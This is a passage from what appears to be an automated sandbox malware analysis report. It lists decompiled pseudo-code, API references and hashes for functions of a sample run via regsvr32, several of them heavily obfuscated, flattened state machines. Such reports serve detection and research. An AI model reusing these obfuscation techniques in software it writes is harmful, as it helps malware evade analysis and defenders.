									if( *0x100952ac() == 0) {
										goto L31;
									}
									E1001B630(_t35, _t38 + 0x80, 0xa);
									goto L30;
								}
							}
						}
						_t51 =  *_t20;
						if( *_t20 == 0) {
							goto L15;
						}
						E10026318(_t51);
					}
				}
			}

0x10026143
0x10026143
0x1002614e
0x10026157
0x10026165
0x10026159
0x1002615e
0x1002615e
0x10026157
0x1002616f
0x10026175
0x100261fb
0x100261fb
0x1002617b
0x1002617b
0x10026183
0x10026191
0x10026196
0x10026196
0x10026199
0x1002619e
0x100261a3
0x100261b5
0x100261ba
0x100261bf
0x100261bf
0x100261c2
0x100261c8
0x100261d0
0x100261ec
0x100261ee
0x00000000
0x00000000
0x100261f0
0x100261f2
0x00000000
0x00000000
0x100261f4
0x100261d6
0x100261d8
0x100261e5
0x100261e5
0x10026200
0x10026206
0x100262ba
0x100262ba
0x00000000
0x100262ba
0x10026218
0x1002621d
0x00000000
0x10026247
0x10026247
0x1002624d
0x10026256
0x10026260
0x10026264
0x10026264
0x10026268
0x1002626e
0x100262b5
0x100262b7
0x00000000
0x10026270
0x10026270
0x10026272
0x10026273
0x10026278
0x10026286
0x00000000
0x00000000
0x1002628b
0x1002628d
0x1002628e
0x10026293
0x100262a1
0x00000000
0x00000000
0x100262ad
0x00000000
0x100262b2
0x1002626e
0x1002621d
0x100261da
0x100261dc
0x00000000
0x00000000
0x100261de
0x100261de
0x100261d0

APIs

IsValidCodePage.KERNEL32(00000000,10090E58,?,10090DD4,1001F8E7,?,10095038,?,?,?,00000000), ref: 10026227
IsValidLocale.KERNEL32(00000001), ref: 1002623D

Part of subcall function 10026874: GetVersionExA.KERNEL32(?), ref: 1002688E

Part of subcall function 100266B6: EnumSystemLocalesA.KERNEL32(100266ED,00000001,10090E58,?,10090DD4,1001F8E7,?,10095038,?,?,?,00000000), ref: 100266D6

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Valid$CodeEnumLocaleLocalesPageSystemVersion
String ID:
API String ID: 2902790910-0
Opcode ID: a5b4fc80dc4db0e9a92b2f5c38237b90ebbb9d47bd7e257f3d05ddde35e7c33b
Instruction ID: 04c5998920bf4abf13dc3f3a5a1dbc85ad3727ee6320d6e73ae2fddb9e4ee026
Opcode Fuzzy Hash: a5b4fc80dc4db0e9a92b2f5c38237b90ebbb9d47bd7e257f3d05ddde35e7c33b
Instruction Fuzzy Hash: 5C31E871605250DFE754CF62ACC171A37D9FB0E385F85402AF908AB1A1D723AC48C751

Uniqueness

Uniqueness Score: -1.00%

Function 100492F7 Relevance: 3.1, APIs: 2, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E100492F7(CHAR* _a4, intOrPtr* _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* __ebp;
				signed char _t21;
				void* _t23;
				intOrPtr _t36;
				void* _t37;
				signed int _t43;
				intOrPtr* _t45;

				_t45 = _a8;
				_push(_a4);
				_t43 = _t45 + 0x12;
				_push(_t43);
				_t21 = E100489BD();
				if(_t21 != 0) {
					_t23 = FindFirstFileA(_a4,  &_v324);
					_t44 = _t43 | 0xffffffff;
					if(_t23 != (_t43 | 0xffffffff)) {
						FindClose(_t23);
						 *(_t45 + 0x10) = _v324.dwFileAttributes & 0x0000007f;
						 *((intOrPtr*)(_t45 + 0xc)) = _v324.nFileSizeLow;
						 *_t45 =  *((intOrPtr*)(E10037F21( &_a4,  &(_v324.ftCreationTime), _t44)));
						 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(E10037F21( &_a4,  &(_v324.ftLastAccessTime), _t44)));
						_t36 =  *((intOrPtr*)(E10037F21( &_a4,  &(_v324.ftLastWriteTime), _t44)));
						 *((intOrPtr*)(_t45 + 4)) = _t36;
						if( *_t45 == 0) {
							 *_t45 = _t36;
						}
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							 *((intOrPtr*)(_t45 + 8)) =  *((intOrPtr*)(_t45 + 4));
						}
						_t37 = 1;
						return _t37;
					}
					L3:
					return 0;
				}
				 *_t43 =  *_t43 & _t21;
				goto L3;
			}

0x10049301
0x10049305
0x10049308
0x1004930b
0x1004930c
0x10049313
0x10049323
0x10049329
0x1004932e
0x10049335
0x10049347
0x10049350
0x10049362
0x10049376
0x10049388
0x1004938a
0x10049390
0x10049392
0x10049392
0x10049398
0x1004939d
0x1004939d
0x100493a2
0x00000000
0x100493a2
0x10049330
0x00000000
0x10049330
0x10049315
0x00000000

APIs

Part of subcall function 100489BD: __EH_prolog.LIBCMT ref: 100489C2
Part of subcall function 100489BD: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 100489E0
Part of subcall function 100489BD: lstrcpynA.KERNEL32(?,?,00000104), ref: 100489EF

FindFirstFileA.KERNEL32(?,?,?,?), ref: 10049323
FindClose.KERNEL32(00000000), ref: 10049335

Part of subcall function 10037F21: FileTimeToLocalFileTime.KERNEL32(?,?), ref: 10037F31
Part of subcall function 10037F21: FileTimeToSystemTime.KERNEL32(?,?), ref: 10037F43

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FileTime$Find$CloseFirstFullH_prologLocalNamePathSystemlstrcpyn
String ID:
API String ID: 1806329094-0
Opcode ID: 879594e05fbeefd485f8a5342b97c17965dca57400bc521ba6362007e331c993
Instruction ID: d54900dca2d507aac1773ff0931c320ba8750b4c619e538450679124db7f93b7
Opcode Fuzzy Hash: 879594e05fbeefd485f8a5342b97c17965dca57400bc521ba6362007e331c993
Instruction Fuzzy Hash: 54216D36400215AFC721DF65C844ADABBF8FF4A350F10897AE99AC71A1E730EA84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002910F Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 10029128
WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 1002914E

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharInfoLocaleMultiWide
String ID:
API String ID: 1196101659-0
Opcode ID: 14264f06762b9f34f9f9902c20d8398ec46a16f0698a37ed818ee9c4dff05157
Instruction ID: e1912b07789e459bfc5b7ec513b454d7fda3826a7b5364121d7b264b0889bbcd
Opcode Fuzzy Hash: 14264f06762b9f34f9f9902c20d8398ec46a16f0698a37ed818ee9c4dff05157
Instruction Fuzzy Hash: D3F01732901166EBCF258F86EC49A8F7F75FB85BE0F924225F925621A0D7304921DA90

Uniqueness

Uniqueness Score: -1.00%

Function 10028FF6 Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E10028FF6() {
				int _t13;
				void* _t21;

				 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
				if(0 == 0 || GetLocaleInfoA( *(_t21 + 8),  *(_t21 + 0xc), 0,  *(_t21 - 0x1c)) == 0) {
					_t13 = 0;
				} else {
					if( *((intOrPtr*)(_t21 + 0x14)) != 0) {
						_push( *((intOrPtr*)(_t21 + 0x14)));
						_push( *((intOrPtr*)(_t21 + 0x10)));
					} else {
						_push(0);
						_push(0);
					}
					_t13 = MultiByteToWideChar( *(_t21 + 0x18), 1, 0, 0xffffffff, ??, ??);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t21 - 0x10));
				return _t13;
			}

0x10028ffd
0x10029003
0x10029038
0x10029019
0x1002901c
0x10029022
0x10029025
0x1002901e
0x1002901e
0x1002901f
0x1002901f
0x10029030
0x10029030
0x10029040
0x1002904b

APIs

GetLocaleInfoA.KERNEL32(?,?,?,100952D0,?,100952D0,00000001,00000004,00000000,?,?), ref: 1002900F
MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,100952D0,?,100952D0,00000001,00000004,00000000,?,?), ref: 10029030

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharInfoLocaleMultiWide
String ID:
API String ID: 1196101659-0
Opcode ID: e44d9b2b3da5122baba114fa634709bb5a0c10a4828dc3f61aa6c2573bcc8361
Instruction ID: 43cab58428b354fe0b32aaaf70b60edcbc543e4e71e88333d7c86f3021994221
Opcode Fuzzy Hash: e44d9b2b3da5122baba114fa634709bb5a0c10a4828dc3f61aa6c2573bcc8361
Instruction Fuzzy Hash: 44F0BE3290052AEFCF358F85EC89ACE7B71FB857F1F504265FD24620A0D3314820CA90

Uniqueness

Uniqueness Score: -1.00%

Function 003D3E98 Relevance: 2.8, Strings: 2, Instructions: 270
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E003D3E98() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _t267;
				intOrPtr _t270;
				signed int _t282;
				signed int _t288;
				intOrPtr _t289;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t323;
				void* _t324;
				signed int _t328;
				void* _t329;
				void* _t332;

				_t328 = _v44;
				_t289 = 0;
				_v20 = 0xa94;
				_t324 = 0x945e;
				_t323 = _v44;
				_v16 = 0x5b1c;
				_v12 = 0xd4e1e;
				_v8 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t332 = _t324 - 0xb1d17;
						if(_t332 > 0) {
							break;
						}
						if(_t332 == 0) {
							_v56 = 0x27a291;
							_v56 = _v56 + 0xb6f2;
							_v56 = _v56 ^ 0x0023978a;
							_v52 = 0xe9e11e;
							_v52 = _v52 << 5;
							_t293 = 0x3f;
							_v52 = _v52 * 0x57;
							_v52 = _v52 ^ 0xef704e80;
							_v48 = 0xc4ccad;
							_v48 = _v48 / _t293;
							_v48 = _v48 + 0xffff94a9;
							_v48 = _v48 ^ 0x0001bdf5;
							_v60 = 0xdc8ff5;
							_v60 = _v60 << 0xa;
							_v60 = _v60 << 0x10;
							_v60 = _v60 ^ 0x5bcbd2a4;
							_t245 =  &_v60;
							 *_t245 = _v60 ^ 0x8fcd20b4;
							__eflags =  *_t245;
							E003D9B62(_v56, _v52, _v48, _t323, _v60);
							L23:
							return _t289;
						}
						if(_t324 == 0x945e) {
							_t324 = 0x8d7e1;
							continue;
						}
						if(_t324 == 0x119ed) {
							_v64 = 0x8a3ea3;
							_v64 = _v64 >> 0xb;
							_v64 = _v64 + 0xffff0cac;
							_t295 = 0x17;
							_v64 = _v64 * 0x59;
							_v64 = _v64 ^ 0xffb1697a;
							_v60 = 0xa123bd;
							_v60 = _v60 >> 0xe;
							_t296 = 0x3a;
							_v60 = _v60 / _t295;
							_v60 = _v60 ^ 0x00099f51;
							_v48 = 0x932a8f;
							_v48 = _v48 / _t296;
							_v48 = _v48 | 0xcaa3a984;
							_v48 = _v48 ^ 0xcaa20292;
							_v52 = 0x94aa46;
							_v52 = _v52 + 0xffff88ea;
							_v52 = _v52 * 0x2b;
							_v52 = _v52 ^ 0x18e77991;
							_v56 = 0x8562a9;
							_v56 = _v56 << 5;
							_v56 = _v56 << 0x10;
							_v56 = _v56 ^ 0x5524de1c;
							_t267 =  *0x3e2208; // 0x28e510
							E003D6823(_v60, _v64 + _v24, _t267 + 0x22c, _v28, _v48, _v52, _v56);
							_t270 =  *0x3e2208; // 0x28e510
							_t329 = _t329 + 0x14;
							_t289 = 1;
							_t324 = 0xc968c;
							 *((intOrPtr*)(_t270 + 0x10)) = _v32;
							continue;
						}
						if(_t324 == 0x69ffb) {
							_v60 = 0xbe8fb8;
							_t324 = 0xb1d17;
							_v60 = _v60 * 0x77;
							_v60 = _v60 >> 3;
							_v60 = _v60 ^ 0x0b1299d2;
							__eflags = _v44 - _v60;
							if(_v44 > _v60) {
								_v48 = 0xa05c88;
								_v48 = _v48 + 0xa216;
								_v48 = _v48 ^ 0x00a44916;
								_v60 = 0x20d622;
								_v60 = _v60 >> 0xc;
								_v60 = _v60 + 0x2e6d;
								_v60 = _v60 ^ 0x00003db9;
								_v64 = 0x4768c0;
								_t300 = 0x5a;
								_v64 = _v64 / _t300;
								_v64 = _v64 >> 9;
								_t301 = 0x2b;
								_v64 = _v64 / _t301;
								_v64 = _v64 ^ 0x0004b4c1;
								_t288 = E003DDFCE(_v48, _v60,  &_v36,  *((intOrPtr*)(_t323 + 0xc)), _v64);
								_t329 = _t329 + 0xc;
								_v40 = _t288;
								__eflags = _t288;
								if(_t288 != 0) {
									_t324 = 0xfd20e;
								}
							}
							continue;
						}
						if(_t324 != 0x8d7e1) {
							goto L20;
						} else {
							_v52 = 0xafa039;
							_t299 = 0x75;
							_v52 = _v52 * 0x6c;
							_v52 = _v52 ^ 0x4a1d1fad;
							_v48 = 0xaf4986;
							_v48 = _v48 / _t299;
							_v48 = _v48 ^ 0x000f7f55;
							_t328 = E003C5973();
							_t324 = 0xee489;
							continue;
						}
					}
					__eflags = _t324 - 0xc968c;
					if(_t324 == 0xc968c) {
						_v56 = 0x83e5ce;
						_v56 = _v56 * 0x41;
						_v56 = _v56 | 0xe0dabcaf;
						_v56 = _v56 ^ 0xe1f75026;
						_v52 = 0x4ec5a6;
						_v52 = _v52 >> 0x10;
						_v52 = _v52 | 0xe101755b;
						_v52 = _v52 ^ 0xe10255e6;
						_v60 = 0xdaa2d8;
						_v60 = _v60 << 0xb;
						_v60 = _v60 ^ 0xd513ee51;
						_v48 = 0x7ceb01;
						_v48 = _v48 + 0x62b7;
						_v48 = _v48 + 0xa286;
						_t208 =  &_v48;
						 *_t208 = _v48 ^ 0x00769d7a;
						__eflags =  *_t208;
						E003C79D0(_v56, _v52,  *_t208, _v60, _v40, _v48);
						_t329 = _t329 + 0xc;
						_t324 = 0xb1d17;
						goto L20;
					}
					__eflags = _t324 - 0xee489;
					if(_t324 == 0xee489) {
						_v60 = 0xe024a;
						_v60 = _v60 ^ 0x1ba80103;
						_v60 = _v60 + 0xb5b3;
						_v60 = _v60 | 0x3d881d73;
						_v60 = _v60 ^ 0x3fad64c1;
						_v52 = 0xb6f517;
						_v52 = _v52 + 0xffff7f1b;
						_v52 = _v52 ^ 0x00bbcf0f;
						_v48 = 0xde5250;
						_v48 = _v48 ^ 0x18c5e4ac;
						_v48 = _v48 + 0x39;
						_v48 = _v48 ^ 0x181817fe;
						_t323 = E003CC703(_v60, _t328, _v52, _v48,  &_v44);
						_t329 = _t329 + 0xc;
						__eflags = _t323;
						if(_t323 == 0) {
							goto L23;
						}
						_t324 = 0x69ffb;
						goto L1;
					}
					__eflags = _t324 - 0xfd20e;
					if(_t324 != 0xfd20e) {
						goto L20;
					}
					_v64 = 0x811586;
					_v64 = _v64 * 0x1f;
					_v64 = _v64 | 0xe6098747;
					_v64 = _v64 + 0x3fb1;
					_v64 = _v64 ^ 0xefad8b6a;
					_v48 = 0x1c2fcb;
					_v48 = _v48 | 0xc1e06070;
					_v48 = _v48 + 0xffff9123;
					_v48 = _v48 ^ 0xc1ffa34a;
					_v60 = 0xd94efe;
					_v60 = _v60 ^ 0x14a5af40;
					_v60 = _v60 + 0xffff8aed;
					_v60 = _v60 * 0x7f;
					_v60 = _v60 ^ 0x29b4cf79;
					_v52 = 0x233014;
					_v52 = _v52 + 0xffff8566;
					_v52 = _v52 ^ 0x002ce08a;
					_t282 = E003D44A7( &_v40, _v64, _v48,  &_v32, _v60, _v52);
					_t329 = _t329 + 0x10;
					asm("sbb esi, esi");
					_t324 = ( ~_t282 & 0xfff48361) + 0xc968c;
					goto L1;
					L20:
					__eflags = _t324 - 0x375e6;
				} while (_t324 != 0x375e6);
				goto L23;
			}

0x003d3e9d
0x003d3ea1
0x003d3ea4
0x003d3eac
0x003d3eb2
0x003d3eb6
0x003d3ebe
0x003d3ec6
0x003d3ec6
0x003d3eca
0x003d3eca
0x003d3eca
0x003d3eca
0x003d3ed0
0x00000000
0x00000000
0x003d3ed6
0x003d4341
0x003d434b
0x003d4353
0x003d435b
0x003d4363
0x003d436f
0x003d4370
0x003d4374
0x003d437c
0x003d438a
0x003d438e
0x003d4396
0x003d439e
0x003d43a6
0x003d43ab
0x003d43b0
0x003d43b8
0x003d43b8
0x003d43b8
0x003d43d1
0x003d43dc
0x003d43e2
0x003d43e2
0x003d3ee2
0x003d4120
0x00000000
0x003d4120
0x003d3eee
0x003d4024
0x003d402e
0x003d4033
0x003d4042
0x003d4045
0x003d4049
0x003d4051
0x003d4059
0x003d406c
0x003d406d
0x003d4073
0x003d407b
0x003d4089
0x003d408d
0x003d4095
0x003d409d
0x003d40a5
0x003d40b2
0x003d40b6
0x003d40be
0x003d40c6
0x003d40cb
0x003d40d0
0x003d40e4
0x003d40ff
0x003d4104
0x003d410f
0x003d4112
0x003d4113
0x003d4118
0x00000000
0x003d4118
0x003d3efa
0x003d3f59
0x003d3f61
0x003d3f6b
0x003d3f6f
0x003d3f74
0x003d3f80
0x003d3f84
0x003d3f8a
0x003d3f94
0x003d3f9c
0x003d3fa4
0x003d3fac
0x003d3fb1
0x003d3fb9
0x003d3fc1
0x003d3fcf
0x003d3fd4
0x003d3fda
0x003d3fe3
0x003d3fe6
0x003d3fee
0x003d4006
0x003d400b
0x003d400e
0x003d4012
0x003d4014
0x003d401a
0x003d401a
0x003d4014
0x00000000
0x003d3f84
0x003d3f02
0x00000000
0x003d3f08
0x003d3f08
0x003d3f19
0x003d3f1a
0x003d3f1e
0x003d3f26
0x003d3f34
0x003d3f38
0x003d3f4d
0x003d3f4f
0x00000000
0x003d3f4f
0x003d3f02
0x003d412a
0x003d4130
0x003d429c
0x003d42a9
0x003d42ad
0x003d42b5
0x003d42bd
0x003d42c5
0x003d42ca
0x003d42d2
0x003d42da
0x003d42e2
0x003d42e7
0x003d42ef
0x003d42f7
0x003d42ff
0x003d4307
0x003d4307
0x003d4307
0x003d4323
0x003d4328
0x003d432b
0x00000000
0x003d432b
0x003d4136
0x003d413c
0x003d4210
0x003d421c
0x003d4226
0x003d422e
0x003d4236
0x003d423e
0x003d4246
0x003d424e
0x003d4256
0x003d425e
0x003d4266
0x003d426b
0x003d4285
0x003d4287
0x003d428a
0x003d428c
0x00000000
0x00000000
0x003d4292
0x00000000
0x003d4292
0x003d4142
0x003d4148
0x00000000
0x00000000
0x003d414e
0x003d415f
0x003d4163
0x003d416b
0x003d4173
0x003d417b
0x003d4183
0x003d418b
0x003d4193
0x003d419b
0x003d41a3
0x003d41ab
0x003d41b8
0x003d41c0
0x003d41c8
0x003d41d0
0x003d41d8
0x003d41f1
0x003d41f6
0x003d41fd
0x003d4205
0x00000000
0x003d4330
0x003d4330
0x003d4330
0x00000000

Strings

9, xrefs: 003D4266
m., xrefs: 003D3FB1

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 9$m.
API String ID: 0-2678496814
Opcode ID: 9ce1b2e7b8fb7d3f67049bc95d02209400b28c0e025e20a78896b6fe0265be6d
Instruction ID: df489d33174371e6441a31961c9e4f840ec3b855b01ec1747c562cb61e560fa2
Opcode Fuzzy Hash: 9ce1b2e7b8fb7d3f67049bc95d02209400b28c0e025e20a78896b6fe0265be6d
Instruction Fuzzy Hash: DFD123729083028FC345CF25D58541FBBE1BBD8758F114A2EF5D9AA261D3B8CA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 003CD0F7 Relevance: 2.8, Strings: 2, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E003CD0F7(signed int* __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v24;
				char _v28;
				char _v56;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t225;
				void* _t227;
				signed int _t230;
				signed int _t237;
				signed int _t251;
				signed int _t253;
				signed int* _t265;
				void* _t269;
				signed int _t270;
				signed int _t271;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t285;
				intOrPtr _t304;
				void* _t306;
				signed int _t307;
				signed int _t308;
				intOrPtr* _t309;
				void* _t310;
				void* _t311;

				_t309 = _a12;
				_t265 = __ecx;
				_push(_t309);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t225);
				_t311 = _t310 + 0x14;
				_v76 = 0x56e0d;
				_t304 = 0;
				_v72 = 0x26298;
				_t227 = 0xa455e;
				_v68 = 0;
				_t306 = 0xeda46;
				while(_t227 != 0x7e66) {
					if(_t227 == 0x3bf0d) {
						_v96 = 0xbaea71;
						_t270 = 0x2a;
						_v96 = _v96 * 0x66;
						_v96 = _v96 ^ 0x4a7d0339;
						_v100 = 0x4620cd;
